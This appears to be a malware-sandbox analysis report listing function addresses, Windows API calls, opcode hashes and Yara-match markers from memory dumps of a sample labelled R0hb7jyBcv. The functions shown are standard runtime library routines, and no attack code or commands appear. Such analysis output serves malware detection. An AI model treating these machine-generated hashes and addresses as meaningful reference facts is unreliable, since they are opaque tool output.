API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction ID: 5013fe3037e0768bfd62f14d22787ef66facb28a79bf9f2196e83f8697cf1781
Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction Fuzzy Hash: 5611B2729001249BDF15EBB5C804AFEBB76EF44722F14055FE81AA7390DB749E04CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004033EF
std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
int.LIBCPMT ref: 00403415

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 0040341E
std::_Facet_Register.LIBCPMT ref: 0040344F
std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
__CxxThrowException@8.LIBVCRUNTIME ref: 0040348B

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 731508520368e75c7ea612f84dcea702521109302910a029de8bbf3d5de5a9a9
Instruction ID: cdc69c2a9e90ba919e1258be772e803faed7ee3eebec81448dba6679bc4cf361
Opcode Fuzzy Hash: 731508520368e75c7ea612f84dcea702521109302910a029de8bbf3d5de5a9a9
Instruction Fuzzy Hash: 8E11BF329001289BCB05EFA4C815AEE7B78EF84319F10452EE911BB2D1DB789A04CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004035FA
std::_Lockit::_Lockit.LIBCPMT ref: 00403609
int.LIBCPMT ref: 00403620

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 00403629
std::_Facet_Register.LIBCPMT ref: 0040365A
std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
__CxxThrowException@8.LIBVCRUNTIME ref: 00403696

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 984f4820562becabbcd105a461c6a574276ccd078b5a22ee02043e0cc13f7d8e
Instruction ID: 76a64bb1f13388b8652502aa8a079a3a0bf37f657045f8e793a704159d5c315e
Opcode Fuzzy Hash: 984f4820562becabbcd105a461c6a574276ccd078b5a22ee02043e0cc13f7d8e
Instruction Fuzzy Hash: FA119032900124ABCB14EF65C805AEE7B74AF48319F10456FE911B73D1DB389A04C799

Uniqueness

Uniqueness Score: -1.00%

Function 02507D27 Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 02507E37
__FindPESection.LIBCMT ref: 02507E51

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 54dc1321dd8cd3b28de84385418ee49d612e2000b84da9548a946ab50f635ecf
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: 47A19A72A01655CBCB14CF68CDC4BAABBB5FB48314F24526AD805AB3D1D735EC01CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00427AC0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00427BD0
__FindPESection.LIBCMT ref: 00427BEA

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 52cd69d4b64803fa133344d4e9d29b6b42e74987d25fff38166c3f8cc652100c
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: 73A1D172B08225CFCB15CF69E9807AEB7B4EB44314F95466AD805EB351D739EC00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 024F69A6 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024F6BF7,00000001,00000001,?), ref: 024F6A00
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024F6BF7,00000001,00000001,?,?,?,?), ref: 024F6A86
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024F6B80
__freea.LIBCMT ref: 024F6B8D

Part of subcall function 024F7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 024F7CDE

__freea.LIBCMT ref: 024F6B96
__freea.LIBCMT ref: 024F6BBB

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction ID: 6155ee4847a5d737d1d6f405ce44a864a08482ec9ebdedd0d54bf7cb57764b4f
Opcode Fuzzy Hash: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction Fuzzy Hash: 9A51D372600226ABEB658F65CC40EAB77AEEBC4754F16462EEE15D7240DB34DC80CA50

Uniqueness

Uniqueness Score: -1.00%

Function 024F1CD3 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 024F1CFF
__cftoe.LIBCMT ref: 024F1D31

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction ID: 2bd233db8cce69931a6862f78da7be16315766c69ce1e27bda2f6a0bfa80be69
Opcode Fuzzy Hash: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction Fuzzy Hash: 7051D873900205EBDFA49B698C40FAB77B9AFC9364F50421FEB1D96291EB31E5408E64

Uniqueness

Uniqueness Score: -1.00%

Function 00411A6C Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00411A98
__cftoe.LIBCMT ref: 00411ACA

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction ID: df7bbd6b43df22bb4be9fc1c410e64f9820c02350ec4393f10609d324cfe3ba4
Opcode Fuzzy Hash: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction Fuzzy Hash: 7551FD72904205ABDF209B699D41EEF77A99F48364F10011FFA15962A2EB3DDD80C65C

Uniqueness

Uniqueness Score: -1.00%

Function 024ECC22 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,024ECC19,024EA4C2), ref: 024ECC30
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024ECC3E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024ECC57
SetLastError.KERNEL32(00000000,?,024ECC19,024EA4C2), ref: 024ECCA9

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction ID: d43dbf0fab72c38d6db9e585b9a6687e6bbfb3f66f83fd5b306016bf41b386ed
Opcode Fuzzy Hash: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction Fuzzy Hash: 6001F7322097119EBF2A2F7AFDCCA6B2759EB41B77720127FE227811F0EF1148119948

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9BB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040C9B2,0040A25B), ref: 0040C9C9
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D7
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9F0
SetLastError.KERNEL32(00000000,?,0040C9B2,0040A25B), ref: 0040CA42

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction ID: ee19b3e2510f7423959140ec21889b16034e20938e88c6190324d52fb0663b51
Opcode Fuzzy Hash: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction Fuzzy Hash: 8601F572649215AEE6395FB9BDC56572A54DB01338720033FF214B12F0EA794C16954C

Uniqueness

Uniqueness Score: -1.00%

Function 024F6F80 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,024EE697,?,?,?,024EED94,?), ref: 024F6F84
_free.LIBCMT ref: 024F6FB7
_free.LIBCMT ref: 024F6FDF
SetLastError.KERNEL32(00000000), ref: 024F6FEC
SetLastError.KERNEL32(00000000), ref: 024F6FF8
_abort.LIBCMT ref: 024F6FFE

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: bedd1f5e0b8927a75244ac63c3937186baa635403cfa9f39c76a40722ce20ad7
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: CBF0A43624861126D6A2237A7C08B6B652E9BC1731F67012FFB36E2390EF2588024979

Uniqueness

Uniqueness Score: -1.00%

Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
_free.LIBCMT ref: 00416D50
_free.LIBCMT ref: 00416D78
SetLastError.KERNEL32(00000000), ref: 00416D85
SetLastError.KERNEL32(00000000), ref: 00416D91
_abort.LIBCMT ref: 00416D97

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: dffb23d06d1e15ef1aad1c845134e5c8e8eacf90562cc3591d5b7c0101a08115
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: BDF0F43178871026C2227B367C0ABDB26299FC1775F22052FF91D92291EF2CDCC2815D

Uniqueness

Uniqueness Score: -1.00%

Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000), ref: 0041729F

Strings

-@, xrefs: 0041727C

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: -@
API String ID: 3177248105-2564449678
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 7e42d4c6809e44159ca8b586cb0097734ec1077dc4da662fe3f049ba49388dcf
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: 8B01F7367492279BC7314B699C44A977BB8AF55760B500671F909D7240DB34DC43C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 024E1AE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 024E1B30
std::system_error::system_error.LIBCPMT ref: 024E1B3F

Strings

ios_base::badbit set, xrefs: 024E1AF7, 024E1B18
ios_base::eofbit set, xrefs: 024E1B07
ios_base::failbit set, xrefs: 024E1B02, 024E1B39

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: 5505212fcfdd0618188f1ae9da9e93d186af5227b26ee01eb3d2f38166f3fcd6
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: B2F0FC7194031DB7EF10A6958C00FEA7B589F09791F11C427FD4E66180E7B55D04C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

ios_base::badbit set, xrefs: 00401890, 004018B1
ios_base::eofbit set, xrefs: 004018A0
ios_base::failbit set, xrefs: 0040189B, 004018D2

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 75ed6e1c9f85c34b315a64263d297d3b47a73d9cda343acb434d8109098bbaba
Instruction ID: e154b9f444e369befffee57ff699e9c141b04c4d0561678f3d19f5bf610271a8
Opcode Fuzzy Hash: 75ed6e1c9f85c34b315a64263d297d3b47a73d9cda343acb434d8109098bbaba
Instruction Fuzzy Hash: AEF0226280031CB7DB10BAA18C02FEA7B988F0A754F21C03BFD40361E0E77D5A0482ED

Uniqueness

Uniqueness Score: -1.00%

Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002), ref: 00413A8C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2

Strings

mscoree.dll, xrefs: 00413A85
CorExitProcess, xrefs: 00413A97

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction ID: 222490b34c4e53a5feae2b87ffa662e2080e553be967456abbd25fb90b6b76cf
Opcode Fuzzy Hash: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction Fuzzy Hash: 1EF08130A10218FBDB109F91DC09BAEBFB8EF54752F400069F809A2290DB344E45CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 024FABB7 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: 842ad8c3415d4c1512049b9fd9a4067e7a17be52eb1b69faad3d4e6711bc7266
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: 7271B331A002769FCB61CF55C884ABFBB7AEFC1315F14422BEA5967250DB709981CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A950 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: b33920a143986800139fcf22d81ba1a33bebe7e0c53b62ede7835c02ac38fde1
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: 9E712A71D062969BCB308F94C844AFFBB76EF41360F14022BE91457280D774ACE1C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 024F52CA Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024F533C
_free.LIBCMT ref: 024F535C

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: be09c4f5892d557c8d8e2e0f8c2ab651ce8d198cf468e65a847f84c6c4613c27
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: 00412332A003009FCB14DF78C880A5EB3F2EFC5314B5545AAD616EB390DB71E905CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004150D5
_free.LIBCMT ref: 004150F5

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: 119d67276799711db09ecd5bf14b9939420992e10a89990823b09dedeceb6b84
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: F941E232E00700EBCB15DF79C880A9EB7B1EF89318B1545AAE515EB392D634AD41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0041B300 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0041197C,?,00000000,?,00000001,?,?,00000001,0041197C,?), ref: 0041B34D
__alloca_probe_16.LIBCMT ref: 0041B385
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B3D6
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DD1,?), ref: 0041B3E8
__freea.LIBCMT ref: 0041B3F1

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction ID: fe6b59a793102c77a27ef18a3bbb39662c21b96f940faf78fbed62ac6a6f166a
Opcode Fuzzy Hash: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction Fuzzy Hash: 3831BF72A0021A9BDB249F65CC41EEF7BA5EB40310F04012EFC14D7291EB39DDA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 024FE66A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 024FE673
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 024FE696

Part of subcall function 024F7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 024F7CDE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 024FE6BC
_free.LIBCMT ref: 024FE6CF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 024FE6DE

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction ID: 7d37bc3b720d1ca365230094fd8b7bd5ec90e28cf59e676c493e84d8cfa757ea
Opcode Fuzzy Hash: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction Fuzzy Hash: 1F01B1727012197B777116BB5C88C7B7A6DDAC2EA6794012ABB04D2221DB618C02C5B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E403 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041E40C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E42F

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E455
_free.LIBCMT ref: 0041E468
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E477

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction ID: e222fc366bdc9891f1000934aff4c77bc857fdd668f389f9b834644977e06484
Opcode Fuzzy Hash: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction Fuzzy Hash: 9001847AA012157B27211AB75C8CDFB6A6DDEC6FA4315012AFD08D3201DE688C82C5B9

Uniqueness

Uniqueness Score: -1.00%

Function 024F7004 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,024F25ED,024F7307,?,024F6FAE,00000001,00000364,?,024EE697,?,?,?,024EED94,?), ref: 024F7009
_free.LIBCMT ref: 024F703E
_free.LIBCMT ref: 024F7065
SetLastError.KERNEL32(00000000), ref: 024F7072
SetLastError.KERNEL32(00000000), ref: 024F707B

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: 152f9bc0e35b1a0b7c825d9e8faf0ac732fe04842af2101e6f4e6fd6cc8a1ca3
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: B101D6762406012F97B2277A6C84F6BA22FDFC1770F21013BF726A2690EF2D88034D65

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
